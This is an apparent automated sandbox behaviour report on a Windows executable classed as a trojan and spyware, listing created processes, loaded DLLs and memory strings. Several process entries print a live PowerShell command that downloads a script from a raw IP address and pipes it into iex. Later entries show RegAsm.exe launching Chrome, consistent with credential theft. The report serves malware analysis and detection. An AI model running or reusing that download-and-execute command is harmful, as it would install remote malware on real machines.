Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0040B1D0	7_2_0040B1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043E9A0	7_2_0043E9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004039B0	7_2_004039B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004209B0	7_2_004209B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00401277	7_2_00401277
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043E212	7_2_0043E212
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0040DA20	7_2_0040DA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041D220	7_2_0041D220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00409340	7_2_00409340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0040AB40	7_2_0040AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00421379	7_2_00421379
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00428B00	7_2_00428B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043C311	7_2_0043C311
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00401319	7_2_00401319
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00425B22	7_2_00425B22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00433BC3	7_2_00433BC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004333D3	7_2_004333D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004353B0	7_2_004353B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0042AC42	7_2_0042AC42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00409C61	7_2_00409C61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00424C70	7_2_00424C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043FCC0	7_2_0043FCC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00414C80	7_2_00414C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0042AC85	7_2_0042AC85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00436490	7_2_00436490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0042D495	7_2_0042D495
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0042AC9C	7_2_0042AC9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00434D40	7_2_00434D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00429C75	7_2_00429C75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00407550	7_2_00407550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0042AD52	7_2_0042AD52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0040F560	7_2_0040F560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00405530	7_2_00405530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00423DD0	7_2_00423DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043E5E0	7_2_0043E5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004305E0	7_2_004305E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0040A5F0	7_2_0040A5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0040B660	7_2_0040B660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004426C8	7_2_004426C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00424ED7	7_2_00424ED7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004266F0	7_2_004266F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004366F7	7_2_004366F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0040DE80	7_2_0040DE80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043FFF0	7_2_0043FFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00407F80	7_2_00407F80

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040CC90 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00416FF0 appears 72 times

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@47/19@5/6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 7_2_004358F0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

7_2_004358F0

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\scoped_dir4212_1753283128

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9092:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9092:304:WilStaging_02

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmr3gpqi.uqi.ps1

Jump to behavior

Source: 7IXl1M9JGV.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\7IXl1M9JGV.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chrome.exe, 00000008.00000003.1270861773.000009B402294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143908946.000009B402294000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 45;
Source: chrome.exe, 00000008.00000002.2143602583.000009B4020C4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '756F6A466879157E';
Source: chrome.exe, 00000008.00000002.2135416481.000009B400D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1082721228.000009B40172C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137825569.000009B401144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.969279610.000009B4010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139268132.000009B401370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2144067444.000009B402405000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1546757959.000009B400D83000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1071652311.000009B4017BC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'AD411B741D0DA012' AND metrics.metric_value > 0;
Source: chrome.exe, 00000008.00000002.2136823412.000009B400F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 120;
Source: chrome.exe, 00000008.00000002.2135416481.000009B400D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1082721228.000009B40172C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137825569.000009B401144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.969279610.000009B4010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139268132.000009B401370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2144067444.000009B402405000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1546757959.000009B400D83000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1071652311.000009B4017BC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'B4CFE8741404B691' AND metrics.metric_value > 0;
Source: chrome.exe, 00000008.00000002.2137169781.000009B40103C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '19E16122849E343B';
Source: chrome.exe, 00000008.00000002.2143240377.000009B401F94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(id) FROM metrics WHERE metrics.metric_hash = '64BD7CCE5A95BF00';
Source: chrome.exe, 00000008.00000002.2133098922.000009B4008C4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: chrome.exe, 00000008.00000002.2140494319.000009B401550000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '79964621D357AB88';
Source: chrome.exe, 00000008.00000002.2132840549.000009B400848000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '534661B278B11BD';

Source: 7IXl1M9JGV.exe

ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Users\user\Desktop\7IXl1M9JGV.exe "C:\Users\user\Desktop\7IXl1M9JGV.exe"
Source: C:\Users\user\Desktop\7IXl1M9JGV.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\7IXl1M9JGV.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} \| iex"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} \| iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES267D.tmp" "c:\Users\user\AppData\Local\Temp\qh4rltex\CSCE36AEDAA1DED41D2AE2F4E1F8F6B418.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2240,i,9410338338245658404,8663607227603881870,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2252 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --no-subproc-heap-profiling --field-trial-handle=3808,i,9410338338245658404,8663607227603881870,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=5316 /prefetch:3
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\7IXl1M9JGV.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} \| iex"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} \| iex"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES267D.tmp" "c:\Users\user\AppData\Local\Temp\qh4rltex\CSCE36AEDAA1DED41D2AE2F4E1F8F6B418.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2240,i,9410338338245658404,8663607227603881870,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2252 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --no-subproc-heap-profiling --field-trial-handle=3808,i,9410338338245658404,8663607227603881870,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=5316 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\7IXl1M9JGV.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7IXl1M9JGV.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
